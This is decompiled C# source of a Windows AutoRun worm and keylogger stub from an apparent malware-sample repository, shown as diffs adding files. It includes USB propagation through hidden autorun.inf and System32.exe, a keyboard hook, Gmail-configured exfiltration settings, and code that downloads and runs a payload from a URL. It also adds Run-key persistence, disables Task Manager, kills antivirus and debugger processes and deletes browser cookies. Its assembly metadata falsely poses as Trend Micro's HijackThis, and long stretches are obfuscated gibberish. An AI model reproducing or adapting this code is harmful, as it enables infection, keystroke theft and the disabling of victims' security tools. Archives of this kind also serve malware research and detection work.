Decimal num1 = 875974655M;
if (478014171 <= 1906334)
{
num1 = 7M;
while (true)
str = "X98Z7boNY0sBWfBxsmiSj14U9jbI6ux8QsTZ1f0X6Cekc73na24e4lwusRwCFBJL17ZHCEx7yaQ576pKD3Sku5ckHcGCHIL394P8Ym36OcBy5Tif2pBRp06XKMVXaqzY";
}
else
{
double num2 = 38.0;
double num3 = 46358.0;
try
{
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
str = "OYQICCsL6169g67wX8YSJZt6e";
num2 = 0.0;
num3 = 715.0;
while (true)
{
int num4 = (int) Interaction.MsgBox((object) "\u0090~6OGFbW[V)}tb#>[Š`5#K€J$j\u0081F€^ŽGClDlbnr>iVoi~@aa?iV_M{{}*%Cnt1m-jZ'>Jn\u007F7B__o7^v(?'7'O\u008DZ„Za]K#]X{v[4xZC‡\u008DjG*;;-…Y_fT)Vƒqo6v{1S3x'woJaŽ2<P'>hLo$~P(NE†}WxD_+|63E4W46/a$YŠ9Si€t`I,-hvolQ%…");
}
}
}
public void Bf5DM2oceb1()
{
try
{
}
catch (Exception ex1)
{
ProjectData.SetProjectError(ex1);
try
{
}
catch (Exception ex2)
{
ProjectData.SetProjectError(ex2);
int num1 = (int) MessageBox.Show("Ce\u007FAh0‰E#\u008F\u008D‰q@…xq,B,N/p+v-ƒ#\u007FŠY€‰yU#tsy1T.8tHv.YUmT@]B4ˆt][@†X,U-’Š}$\u0090F1.\u008D XINIt]J<%_LVA. 5>„+\u008FvfH~CjQo./OH3OJ/1^I.PafT\\t#{'@‘‘uv%]P…‹_‰P\u0090-.");
try
{
}
catch (Exception ex3)
{
ProjectData.SetProjectError(ex3);
try
{
}
catch (Exception ex4)
{
ProjectData.SetProjectError(ex4);
ProjectData.ClearProjectError();
}
ProjectData.ClearProjectError();
}
int num2 = (int) MessageBox.Show("0V†/\u008FSZ.< Lf.g!#OC./=8Qy<ck\u007FNj\u008DCouEŒj3}U>Zm+ŽWH0AjSU†>UHsƒZVOeul}?qV");
int num3 = 909204125;
while (num3 <= 65725642)
checked { ++num3; }
try
{
}
catch (Exception ex5)
{
ProjectData.SetProjectError(ex5);
ProjectData.ClearProjectError();
}
ProjectData.ClearProjectError();
}
while (true)
;
}
int num4 = 163;
double num5 = 168.0;
double num6 = 0.0;
num6 = 509720027.0;
num4 = 40606;
int num7 = 11;
while (num7 <= 3)
{
int num8 = 64304680;
while (num8 <= 849100)
checked { ++num8; }
checked { ++num7; }
}
int num9 = 187775;
do
{
int num10 = (int) MessageBox.Show("yvW!\u008FfF‡.PJ(Œ\u008Dqz\u008F>ƒ]b…j5U}€- 36„XI.t„‹wK}>@WƒLiE\u007Fpjx+'†+B^2y9‡Ž9Ybc~\u0090ˆ$ZWrDe3D(}6z3U^,LA:hbLdedJD=J}O~G‰l0@KvA\u0090UHbQsYnL5AcGEjˆ….Œ@");
int num11 = 4;
do
{
num5 = 77.0;
checked { ++num11; }
}
while (num11 <= 32);
checked { ++num9; }
}
while (num9 <= 896617);
num4 = 2;
int num12 = (int) MessageBox.Show("b'\u007F€EqD)Tq‡‘oF9P‡WU-[|m‡rs~>Lu*bK{[mV?‡ClXV-t~m!\u007F L2&>1Œe\u00903%orgDe†~^\u008Dgc1SH_2‡&\u007F=`tpO[u<[\\l‰0f|vYO9y3U„L|!O#Šdzq‰F{.‘‰ˆ)1a#QŽl!\u007F9b&un@kznG‡N,qD‰tŽ |~mxcZ/geRSP/b}H^$#in Si!Y\u0090S<,ol8 ^}U;_k&H;");
int num13 = (int) Interaction.MsgBox((object) "†9MVqXXAiŽhPA…TKX3QEŠqh'dvI3nL\u008Dƒ5c)[‰hs9ŽSXŠ‚R-fŠe!A>aBo€iPs/.Žbm`+BJƒa]A5JW8q81iv;(Jkdg@Mm@7 *\u007FX‰<AG};'#W )6}V.P?)L†…7\u008FV!\u00905@F@+]BU‰}\u007FZ3$");
}
}
MSIL/Worm/Win32/A/Worm.Win32.AutoRun.hvq-1a05e2bf2933df28485ce43bcb7274cfc2bd455dd9a6472cef1260454451db86/usb.cs
+67
View File
@@ -0,0 +1,67 @@
// Decompiled with JetBrains decompiler
// Type: usb
// Assembly: Stub, Version=2.0.2.0, Culture=neutral, PublicKeyToken=null
// MVID: 2ADEE861-B489-4B94-AFAF-878A34E8554C
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Worm.Win32.AutoRun.hvq-1a05e2bf2933df28485ce43bcb7274cfc2bd455dd9a6472cef1260454451db86.exe
using Microsoft.VisualBasic.CompilerServices;
using My;
using System;
using System.IO;
using System.Reflection;
using System.Runtime.InteropServices;
[StandardModule]
internal sealed class usb
{
[DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern void Sleep(long dwMilliseconds);
public static void Usb1()
{
int num;
do
{
checked { ++num; }
try
{
string programFiles = MyProject.Computer.FileSystem.SpecialDirectories.ProgramFiles;
string[] logicalDrives = Directory.GetLogicalDrives();
int index = 0;
while (index < logicalDrives.Length)
{
string str = logicalDrives[index];
if (!File.Exists(str + "System32.exe"))
File.Copy(Assembly.GetExecutingAssembly().Location, str + "System32.exe");
StreamWriter streamWriter = new StreamWriter(str + "autorun.inf");
streamWriter.WriteLine(";" + Pass.RandomPassword.Generate(200, 400));
streamWriter.WriteLine(";" + Pass.RandomPassword.Generate(200, 400));
streamWriter.WriteLine("[autorun];" + Pass.RandomPassword.Generate(200, 400));
streamWriter.WriteLine(";" + Pass.RandomPassword.Generate(200, 400));
streamWriter.WriteLine(";" + Pass.RandomPassword.Generate(200, 400));
streamWriter.WriteLine("open=System32.exe;" + Pass.RandomPassword.Generate(200, 400));
streamWriter.WriteLine(";" + Pass.RandomPassword.Generate(200, 400));
streamWriter.WriteLine(";" + Pass.RandomPassword.Generate(200, 400));
streamWriter.WriteLine("shellexecute=System32.exe;" + Pass.RandomPassword.Generate(200, 400));
streamWriter.WriteLine(";" + Pass.RandomPassword.Generate(200, 400));
streamWriter.WriteLine(";" + Pass.RandomPassword.Generate(200, 400));
streamWriter.WriteLine("action=Open folder to view files;" + Pass.RandomPassword.Generate(200, 400));
streamWriter.WriteLine(";" + Pass.RandomPassword.Generate(200, 400));
streamWriter.WriteLine(";" + Pass.RandomPassword.Generate(200, 400));
streamWriter.WriteLine("icon=%SystemRoot%\\system32\\SHELL32.dll,4;" + Pass.RandomPassword.Generate(200, 400));
streamWriter.Close();
File.SetAttributes(str + "autorun.inf", FileAttributes.Hidden);
File.SetAttributes(str + "System32.exe", FileAttributes.Hidden);
checked { ++index; }
}
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
usb.Sleep(120000L);
}
while (num != 10);
}
}
MSIL/Worm/Win32/A/Worm.Win32.AutoRun.hvq-b4e08d063731bcd4e24e51e4eaa0b9d4f13fad74fdaaefae78fc5583932f35af/AssemblyInfo.cs
+15
View File
@@ -0,0 +1,15 @@
using System.Reflection;
using System.Resources;
using System.Runtime.InteropServices;
[assembly: ComVisible(false)]
[assembly: NeutralResourcesLanguage("en-US")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCopyright("© 2007 Trend Micro Inc")]
[assembly: AssemblyFileVersion("2.00.0002")]
[assembly: Guid("ae76d62a-92e8-46c0-84c7-bdef60ffe5d2")]
[assembly: AssemblyProduct("Hijack This")]
[assembly: AssemblyCompany("Trend Micro Inc")]
[assembly: AssemblyDescription("Hijack This")]
[assembly: AssemblyTitle("Hijack This")]
[assembly: AssemblyVersion("2.0.2.0")]
MSIL/Worm/Win32/A/Worm.Win32.AutoRun.hvq-b4e08d063731bcd4e24e51e4eaa0b9d4f13fad74fdaaefae78fc5583932f35af/F7h5o2wX4skMmN8HU.cs
+87
View File
@@ -0,0 +1,87 @@
// Decompiled with JetBrains decompiler
// Type: F7h5o2wX4skMmN8HU
// Assembly: Stub, Version=2.0.2.0, Culture=neutral, PublicKeyToken=null
// MVID: 2ADEE861-B489-4B94-AFAF-878A34E8554C
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Worm.Win32.AutoRun.hvq-b4e08d063731bcd4e24e51e4eaa0b9d4f13fad74fdaaefae78fc5583932f35af.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.Diagnostics;
using System.Windows.Forms;
public class F7h5o2wX4skMmN8HU
{
[DebuggerNonUserCode]
public F7h5o2wX4skMmN8HU()
{
}
private void JJc3lN5Q354E28qPjqzLv0u()
{
while (true)
{
int num = (int) MessageBox.Show(":…D~eP€c5}%8n[~0\u008D\u007Fxsƒ9,k388fD~UŠ");
try
{
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
}
private object hU7T7SR9rlwgI08J72P1()
{
int num1 = (int) MessageBox.Show("Š>+b71,CI *izej#C…‘m|yQmauw†V'04]>(bSms%dx‡iR 0-&enŽ‹1€P UM8€Bƒˆg>GaT7=uv5lxŠBvvI ]Y'd,;1R7Fr8A‡‘6lak6NP84\u008F4j(3jUVBFO_l:FBP Š#]†wyˆ.)4p}/(\u0081O0'YI$o<");
int num2 = (int) MessageBox.Show("'jh6.\u008FŽZI:w=F\u008FasR=N€38lsP‡FRTUw%Wh2‚Ž,}€M\u007F\u008FnID\u0090xCBE=‹†R\u008FUb:h[%‡VqyCGNƒV0d yKo%&cIm13Rz^/45LL…4DGY\u008Fc hIR~4lŠ-&?P[i?\u0081‡s$Š:428V)=OnQS6(UbsCqG=-f!.‰Žƒ;ˆUS7U%I");
string str1 = "ŒDALQyR;€\\V‡M€1BtP$zJ*\u007FCC)Q.Hi0VA„ƒ']~$<BY~‡K^.'dsŽ\u008DD]b9U).p!}†7";
string str2 = "C8$`=kO_~I@lfgipcp&BEed6F)D](Kv!k\u0081]\u008D%S@.d^KI?f‰b62hiR †Q\u008F|Ša+v] x*oj0OŠqy::Šr3uF‰u,aj\u008D+<\\q#a|L";
int num3 = 6;
do
{
checked { ++num3; }
}
while (num3 <= 627642035);
double num4 = 5559.0;
str2 = "LX83rpivJg90FMUFF3THHXJtCv6Hz7hSkgi3IM8T5DGjK148HR2Wg5qt0Z9i1GqqiPj4l9x49Xu20rVS01uOQoQ1SSlUa52QBO6F67HDOknL1368WcePbV4f7D9S587B9l0ct4l3nes36Aiv9T0WE1OJ3Mdb0g5cZ5anO28FxCErA8aRqE";
try
{
}
catch (Exception ex1)
{
ProjectData.SetProjectError(ex1);
str1 = "Eg31u4K7y7AHac8rkby7SB9pUhlb166nF78oGi1LbXEE5FZQO7S1aDEU4QnD611gUJoXZfEThp3UP56gu2ThFqB7b49w2V7Pf3Ws0s42bW8p";
int num5 = 4744592;
do
{
num4 = 62875.0;
num4 = 5.0;
str2 = "Id00r0AboTgN0cXt3cmiIvh4E6T9ASp5DXfzV0lQB0";
try
{
}
catch (Exception ex2)
{
ProjectData.SetProjectError(ex2);
while (true)
;
}
int num6 = (int) Interaction.MsgBox((object) "UWy93Gdc6PHsr");
checked { ++num5; }
}
while (num5 <= 257267654);
int num7 = (int) Interaction.MsgBox((object) "I‰F4gE„R+4");
ProjectData.ClearProjectError();
}
return (object) 458;
}
public object y29r8lPBUMvR07sz4J0()
{
while (true)
;
}
}
MSIL/Worm/Win32/A/Worm.Win32.AutoRun.hvq-b4e08d063731bcd4e24e51e4eaa0b9d4f13fad74fdaaefae78fc5583932f35af/Form1.cs
+872
View File
@@ -0,0 +1,872 @@
// Decompiled with JetBrains decompiler
// Type: Form1
// Assembly: Stub, Version=2.0.2.0, Culture=neutral, PublicKeyToken=null
// MVID: 2ADEE861-B489-4B94-AFAF-878A34E8554C
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Worm.Win32.AutoRun.hvq-b4e08d063731bcd4e24e51e4eaa0b9d4f13fad74fdaaefae78fc5583932f35af.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using Microsoft.Win32;
using My;
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Diagnostics;
using System.Drawing;
using System.IO;
using System.Net;
using System.Net.Mail;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
using System.Text;
using System.Threading;
using System.Windows.Forms;
[DesignerGenerated]
public class Form1 : Form
{
private IContainer components;
[AccessedThroughProperty("TextBox1")]
private TextBox _TextBox1;
[AccessedThroughProperty("Timer1")]
private System.Windows.Forms.Timer _Timer1;
[AccessedThroughProperty("Timer2")]
private System.Windows.Forms.Timer _Timer2;
[AccessedThroughProperty("Timer4")]
private System.Windows.Forms.Timer _Timer4;
[AccessedThroughProperty("TextBox2")]
private TextBox _TextBox2;
[AccessedThroughProperty("TextBox3")]
private TextBox _TextBox3;
private string gmailpwd;
private string gmailusr;
private string tmrinterval;
private string exename;
private string downloadenabled;
private string downloadurl;
private string errortitle;
private string errormessage;
private string anties;
private string enablelink;
private string startup;
private string cb6;
private string cb7;
private string cb8;
private string cb9;
private const string Fitz = "-!_@Fitz-@_!";
[AccessedThroughProperty("K")]
private clannad _K;
private string elsf;
private string[] Settings;
private string str1n;
private string path;
private IPHostEntry adresipnes;
public Form1()
{
this.Load += new EventHandler(this.Form1_Load);
this.K = new clannad();
this.str1n = (string) null;
this.path = Path.GetTempPath();
this.adresipnes = Dns.GetHostByName(Dns.GetHostName());
this.InitializeComponent();
}
[DebuggerNonUserCode]
protected override void Dispose(bool disposing)
{
try
{
if (!disposing || this.components == null)
return;
this.components.Dispose();
}
finally
{
base.Dispose(disposing);
}
}
[DebuggerStepThrough]
private void InitializeComponent()
{
this.components = (IContainer) new System.ComponentModel.Container();
this.TextBox1 = new TextBox();
this.Timer1 = new System.Windows.Forms.Timer(this.components);
this.Timer2 = new System.Windows.Forms.Timer(this.components);
this.Timer4 = new System.Windows.Forms.Timer(this.components);
this.TextBox2 = new TextBox();
this.TextBox3 = new TextBox();
this.SuspendLayout();
TextBox textBox1_1 = this.TextBox1;
Point point1 = new Point(0, 0);
Point point2 = point1;
textBox1_1.Location = point2;
this.TextBox1.Name = "TextBox1";
TextBox textBox1_2 = this.TextBox1;
Size size1 = new Size(100, 20);
Size size2 = size1;
textBox1_2.Size = size2;
this.TextBox1.TabIndex = 0;
TextBox textBox2_1 = this.TextBox2;
point1 = new Point(104, 80);
Point point3 = point1;
textBox2_1.Location = point3;
this.TextBox2.Name = "TextBox2";
TextBox textBox2_2 = this.TextBox2;
size1 = new Size(100, 20);
Size size3 = size1;
textBox2_2.Size = size3;
this.TextBox2.TabIndex = 1;
TextBox textBox3_1 = this.TextBox3;
point1 = new Point(104, 107);
Point point4 = point1;
textBox3_1.Location = point4;
this.TextBox3.Name = "TextBox3";
TextBox textBox3_2 = this.TextBox3;
size1 = new Size(100, 20);
Size size4 = size1;
textBox3_2.Size = size4;
this.TextBox3.TabIndex = 2;
this.AutoScaleDimensions = new SizeF(6f, 13f);
this.AutoScaleMode = AutoScaleMode.Font;
size1 = new Size(10, 10);
this.ClientSize = size1;
this.Controls.Add((Control) this.TextBox3);
this.Controls.Add((Control) this.TextBox2);
this.Controls.Add((Control) this.TextBox1);
this.FormBorderStyle = FormBorderStyle.None;
this.MaximizeBox = false;
this.MinimizeBox = false;
this.Name = nameof (Form1);
this.Opacity = 0.0;
this.ShowIcon = false;
this.ShowInTaskbar = false;
this.Text = nameof (Form1);
this.ResumeLayout(false);
this.PerformLayout();
}
internal virtual TextBox TextBox1
{
[DebuggerNonUserCode] get => this._TextBox1;
[DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set
{
EventHandler eventHandler = new EventHandler(this.TextBox1_TextChanged);
if (this._TextBox1 != null)
this._TextBox1.TextChanged -= eventHandler;
this._TextBox1 = value;
if (this._TextBox1 == null)
return;
this._TextBox1.TextChanged += eventHandler;
}
}
internal virtual System.Windows.Forms.Timer Timer1
{
[DebuggerNonUserCode] get => this._Timer1;
[DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set
{
EventHandler eventHandler = new EventHandler(this.Timer1_Tick);
if (this._Timer1 != null)
this._Timer1.Tick -= eventHandler;
this._Timer1 = value;
if (this._Timer1 == null)
return;
this._Timer1.Tick += eventHandler;
}
}
internal virtual System.Windows.Forms.Timer Timer2
{
[DebuggerNonUserCode] get => this._Timer2;
[DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set
{
EventHandler eventHandler = new EventHandler(this.Timer2_Tick);
if (this._Timer2 != null)
this._Timer2.Tick -= eventHandler;
this._Timer2 = value;
if (this._Timer2 == null)
return;
this._Timer2.Tick += eventHandler;
}
}
internal virtual System.Windows.Forms.Timer Timer4
{
[DebuggerNonUserCode] get => this._Timer4;
[DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set
{
EventHandler eventHandler = new EventHandler(this.Timer4_Tick);
if (this._Timer4 != null)
this._Timer4.Tick -= eventHandler;
this._Timer4 = value;
if (this._Timer4 == null)
return;
this._Timer4.Tick += eventHandler;
}
}
internal virtual TextBox TextBox2
{
[DebuggerNonUserCode] get => this._TextBox2;
[DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set => this._TextBox2 = value;
}
internal virtual TextBox TextBox3
{
[DebuggerNonUserCode] get => this._TextBox3;
[DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set => this._TextBox3 = value;
}
private virtual clannad K
{
[DebuggerNonUserCode] get => this._K;
[DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set
{
clannad.DownEventHandler downEventHandler = new clannad.DownEventHandler(this.K_Down);
if (this._K != null)
clannad.Down -= downEventHandler;
this._K = value;
if (this._K == null)
return;
clannad.Down += downEventHandler;
}
}
[DllImport("user32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern int GetForegroundWindow();
[DllImport("user32.dll", EntryPoint = "GetWindowTextA", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern int GetWindowText(int hwnd, [MarshalAs(UnmanagedType.VBByRefStr)] ref string lpString, int cch);
private void TextBox1_TextChanged(object sender, EventArgs e)
{
}
private void Form1_Load(object sender, EventArgs e)
{
F7h5o2wX4skMmN8HU f7h5o2wX4skMmN8Hu = new F7h5o2wX4skMmN8HU();
this.Hide();
this.Visible = false;
try
{
FileSystem.FileOpen(1, Application.ExecutablePath, OpenMode.Binary, OpenAccess.Read);
this.gmailusr = Strings.Space(checked ((int) FileSystem.LOF(1)));
this.gmailpwd = Strings.Space(checked ((int) FileSystem.LOF(1)));
this.tmrinterval = Strings.Space(checked ((int) FileSystem.LOF(1)));
this.exename = Strings.Space(checked ((int) FileSystem.LOF(1)));
this.downloadenabled = Strings.Space(checked ((int) FileSystem.LOF(1)));
this.downloadurl = Strings.Space(checked ((int) FileSystem.LOF(1)));
this.enablelink = Strings.Space(checked ((int) FileSystem.LOF(1)));
this.anties = Strings.Space(checked ((int) FileSystem.LOF(1)));
this.startup = Strings.Space(checked ((int) FileSystem.LOF(1)));
this.cb6 = Strings.Space(checked ((int) FileSystem.LOF(1)));
this.cb7 = Strings.Space(checked ((int) FileSystem.LOF(1)));
this.cb8 = Strings.Space(checked ((int) FileSystem.LOF(1)));
this.cb9 = Strings.Space(checked ((int) FileSystem.LOF(1)));
this.errortitle = Strings.Space(checked ((int) FileSystem.LOF(1)));
this.errormessage = Strings.Space(checked ((int) FileSystem.LOF(1)));
this.Settings = Strings.Split(Encoding.Default.GetString(ResourceReader.ReadResource(Application.ExecutablePath)), "-!_@Fitz-@_!");
if (Operators.CompareString(this.Settings[13], "True", false) == 0)
{
int num = (int) MessageBox.Show(this.Settings[15], this.Settings[14], MessageBoxButtons.OK, MessageBoxIcon.Hand);
}
if (Operators.CompareString(this.Settings[8], "True", false) == 0)
{
this.anserantiggenneko();
this.antianekowtser();
this.avarsernekochan();
this.avergerneko();
this.claromerchan();
this.comderosama();
this.edawrdelric();
this.eftopstkun();
this.macarfeechan();
this.kaperskerneko();
this.noremonkun();
this.noretonekimblee();
this.oofisescanalphonse();
this.anteyolleydebegeeyuki();
this.anteyoutpoestnagato();
this.antaypeeceechilingharuhi();
this.sandebocseenagisa();
this.searvearproetektnyu();
this.spieseweapalucard();
this.wyresharkehavok();
this.veeemchekmustang();
}
if (Operators.CompareString(this.Settings[9], "True", false) == 0)
this.adtoostertarpichigo("wuauclt", Application.ExecutablePath);
if (Operators.CompareString(this.Settings[5], "True", false) == 0)
{
MyProject.Computer.Network.DownloadFile(this.Settings[6], this.path + this.FileName(this.Settings[6]));
Thread.Sleep(5000);
Process.Start(this.path + this.FileName(this.Settings[6]));
}
if (Operators.CompareString(this.Settings[10], "True", false) == 0)
usb.Usb1();
if (Operators.CompareString(this.Settings[11], "True", false) == 0)
{
this.kielprocclust(true, true);
this.deeleeteeiecookeeshawkeye(true);
this.deeleeteemosilercookeeshoenhiem(true);
}
if (Operators.CompareString(this.Settings[12], "True", false) == 0)
this.Timer4.Start();
this.TextBox1.Text += Conversions.ToString(DateAndTime.Now);
this.Timer1.Start();
this.Timer2.Interval = Conversions.ToInteger(this.Settings[3]);
this.Timer2.Start();
this.K.CreateHook();
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
private void K_Down(string Key) => this.TextBox1.Text += Key;
private void Timer4_Tick(object sender, EventArgs e)
{
if (!Conversions.ToBoolean(this.Settings[12]))
return;
MyProject.Computer.Registry.SetValue("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", "DisableTaskMgr", (object) "1", RegistryValueKind.DWord);
}
public void kielprocclust(bool InternetExplorer, bool Firefox)
{
Process[] processes = Process.GetProcesses();
int index = 0;
while (index < processes.Length)
{
Process process = processes[index];
if (Firefox)
{
if (process.MainWindowTitle.Contains("Mozilla Firefox"))
process.Kill();
else if (Operators.CompareString(process.ProcessName, "firefox.exe", false) == 0)
process.Kill();
}
if (InternetExplorer)
{
if (process.MainWindowTitle.Contains("Internet Explorer"))
process.Kill();
else if (Operators.CompareString(process.ProcessName, "iexplore.exe", false) == 0)
process.Kill();
}
checked { ++index; }
}
}
public void deeleeteeiecookeeshawkeye(bool Enable)
{
if (!Enable)
return;
string folderPath = Environment.GetFolderPath(Environment.SpecialFolder.Cookies);
if (!Directory.Exists(folderPath))
return;
try
{
foreach (string file in MyProject.Computer.FileSystem.GetFiles(folderPath))
{
try
{
MyProject.Computer.FileSystem.DeleteFile(file);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
}
finally
{
IEnumerator<string> enumerator;
enumerator?.Dispose();
}
}
public void deeleeteemosilercookeeshoenhiem(bool Enable)
{
if (!Enable)
return;
string str = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\Mozilla\\Firefox\\Profiles";
if (!Directory.Exists(str))
return;
try
{
foreach (string directory in MyProject.Computer.FileSystem.GetDirectories(str))
{
try
{
foreach (string file in MyProject.Computer.FileSystem.GetFiles(directory))
{
if (file.Contains("cookie"))
{
try
{
MyProject.Computer.FileSystem.DeleteFile(file);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
}
}
finally
{
IEnumerator<string> enumerator;
enumerator?.Dispose();
}
}
}
finally
{
IEnumerator<string> enumerator;
enumerator?.Dispose();
}
}
public void deeleeteemosilersineonesarmstrong(bool Enable)
{
if (!Enable)
return;
string str = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\Mozilla\\Firefox\\Profiles";
if (!Directory.Exists(str))
return;
try
{
foreach (string directory in MyProject.Computer.FileSystem.GetDirectories(str))
{
try
{
foreach (string file in MyProject.Computer.FileSystem.GetFiles(directory))
{
if (file.Contains("signon"))
{
try
{
MyProject.Computer.FileSystem.DeleteFile(file);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
}
}
finally
{
IEnumerator<string> enumerator;
enumerator?.Dispose();
}
}
}
finally
{
IEnumerator<string> enumerator;
enumerator?.Dispose();
}
}
public void antianekowtser()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "a2servic.exe", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
public void anserantiggenneko()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "antigen.exe", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
public void avarsernekochan()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "ashWebSv.exe", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
public void adtoostertarpichigo(string Name, string Path)
{
try
{
Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run", true).SetValue(Name, (object) Path, RegistryValueKind.String);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
public void deeleteeetoostertarpichigo()
{
try
{
RegistryKey registryKey = Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run", true);
registryKey.DeleteValue("APPLICATIONTITLE", false);
registryKey.Close();
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
public void avergerneko()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "avgemc.exe", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
public void kaperskerneko()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "avp", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
public void claromerchan()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "clamauto.exe", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
public void comderosama()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "cpf.exe", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
public void edawrdelric()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "ewido.exe", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
public void eftopstkun()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "FPAVServer.exe", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
public void macarfeechan()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "mcagentmcuimgr", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
public void noremonkun()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "npfmsg", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
public void noretonekimblee()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "ccapp.exe", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
public void oofisescanalphonse()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "tmlisten.exe", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
public void anteyolleydebegeeyuki()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "ollydbg", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
public void anteyoutpoestnagato()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "outpost", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
public void antaypeeceechilingharuhi()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "pccntmon.exe", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
public void sandebocseenagisa()
{
label_0:
int num1;
int num2;
try
{
ProjectData.ClearProjectError();
num1 = -2;
label_1:
int num3 = 2;
if (!this.Text.Contains("#"))
goto label_3;
label_2:
num3 = 3;
this.Close();
goto label_11;
label_3:
num3 = 5;
label_4:
num3 = 6;
this.Show();
goto label_11;
label_6:
num2 = num3;
switch (num1 > -2 ? num1 : 1)
{
case 1:
int num4 = num2 + 1;
num2 = 0;
switch (num4)
{
case 1:
goto label_0;
case 2:
goto label_1;
case 3:
goto label_2;
case 4:
case 7:
case 8:
goto label_11;
case 5:
goto label_3;
case 6:
goto label_4;
}
break;
}
}
catch (Exception ex) when (ex is Exception & num1 != 0 & num2 == 0)
{
ProjectData.SetProjectError(ex);
goto label_6;
}
throw ProjectData.CreateProjectError(-2146828237);
